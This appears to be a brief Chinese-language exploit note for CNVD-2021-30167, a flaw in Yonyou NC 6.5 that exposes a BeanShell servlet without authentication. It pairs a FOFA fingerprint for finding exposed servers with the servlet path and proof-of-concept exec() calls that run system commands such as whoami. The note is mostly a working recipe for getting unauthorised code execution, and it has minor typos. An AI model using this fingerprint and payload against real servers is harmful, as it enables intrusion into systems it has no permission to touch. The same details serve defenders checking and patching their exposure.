编号: CNVD-2021-30167
影响版本: NC6.5
fofa指纹: icon_hash="1085941792"
该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。
POC:
# get
/servlet/~ic/bsh.servlet.BshServleteg:
exec("whomai")
exec("cmd /c whoami")
exec("/bin/sh whoami")注:该脚本中的命令执行, 仅适用于Windoes, Linux请手动测试。
